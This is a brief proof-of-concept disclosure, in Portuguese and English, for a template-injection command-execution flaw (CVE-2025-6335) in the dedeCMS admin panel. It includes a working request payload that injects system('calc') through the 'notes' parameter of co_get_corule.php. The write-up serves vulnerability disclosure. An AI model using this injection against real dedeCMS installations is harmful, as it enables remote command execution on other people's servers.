
Exploit de prova de conceito para CVE-2025-6335, uma vulnerabilidade de injeção de template que permite execução de comandos no dedeCMS 5.7 sp2, possibilitando execução arbitrária de comandos por meio da interface administrativa.
BUG_Author: Ewoji
Affected Version: dedeCMS < 5.7.2
Vendor: Shanghai Zhuozhuo Network Technology Co., LTD
Software: dedeCMS
Vulnerability Files:
/include/dedetag.class.phpApós a instalação, faça login no painel de administração
Explorando o Template
Verificando a Exploração:
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
Accessing twice like this can execute the command